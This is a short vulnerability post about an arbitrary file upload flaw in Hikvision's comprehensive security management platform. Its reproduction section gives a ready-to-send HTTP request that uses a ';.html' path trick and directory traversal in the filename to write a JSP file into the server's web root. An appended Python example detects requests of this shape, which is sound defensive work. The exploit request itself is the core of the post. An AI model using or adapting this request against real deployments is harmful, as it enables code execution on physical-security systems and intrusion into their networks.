Hikvision Comprehensive Security Management Platform files Interface Arbitrary File Upload Vulnerability
Vulnerability Description
The files interface of the HiKVISION comprehensive security management platform has an arbitrary file upload vulnerability. An attacker can upload any file through it.
Vulnerability Impact
HiKVISION comprehensive security management platform
Network surveying and mapping
Vulnerability Reproduction
Login page
The operation management center (port 8001) needs to be open.
POST /center/api/files;.html HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%out.print("test3");%>
------WebKitFormBoundary9PggsiM755PLa54a--
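Added example, not part of the original post: a detection check for requests shaped like the one above, flagging a path parameter in the URI, directory traversal in the multipart filename, and a server-side script extension. The function names, the extension list, the host name and the sample requests are assumptions constructed for illustration.

```python
from email.parser import BytesParser
from email.policy import HTTP
from pathlib import PurePosixPath

# Assumed list of file types a Tomcat-style server would execute or deploy.
SCRIPT_EXTS = {".jsp", ".jspx", ".war"}

def inspect_upload(raw: bytes) -> list:
    """Return findings for one raw multipart/form-data HTTP request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, headers = head.partition(b"\r\n")
    path = request_line.split(b" ")[1].decode("latin-1").split("?", 1)[0]
    findings = []
    if ";" in path:  # path parameter appended to the API path, e.g. /files;.html
        findings.append("path-parameter-in-uri")
    # Re-parse headers and body as a MIME message to walk the multipart parts.
    msg = BytesParser(policy=HTTP).parsebytes(headers + b"\r\n\r\n" + body)
    for part in msg.iter_parts():
        name = part.get_filename()
        if not name:
            continue
        p = PurePosixPath(name.replace("\\", "/"))
        if ".." in p.parts or p.is_absolute():
            findings.append("traversal-in-filename")
        if p.suffix.lower() in SCRIPT_EXTS:
            findings.append("server-side-script-extension")
    return findings

def build_request(target: str, filename: str) -> bytes:
    """Constructed sample request (not captured traffic)."""
    b = "----SampleBoundary"
    lines = [
        f"POST {target} HTTP/1.1", "Host: platform.example",
        f"Content-Type: multipart/form-data; boundary={b}", "",
        f"--{b}",
        f'Content-Disposition: form-data; name="file"; filename="{filename}"',
        "Content-Type: application/zip", "", "placeholder", f"--{b}--", "",
    ]
    return "\r\n".join(lines).encode()

# Constructed samples: one modelled on the request above, one ordinary upload.
SUSPICIOUS = build_request("/center/api/files;.html", "../../../webapps/eportal/new.jsp")
BENIGN = build_request("/center/api/files", "report.zip")

if __name__ == "__main__":
    print(inspect_upload(SUSPICIOUS))
    print(inspect_upload(BENIGN))
```

The same three checks can be applied to proxy or WAF captures of traffic to port 8001; any single finding on an upload endpoint is worth reviewing.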
This post is licensed under CC BY 4.0 by the author.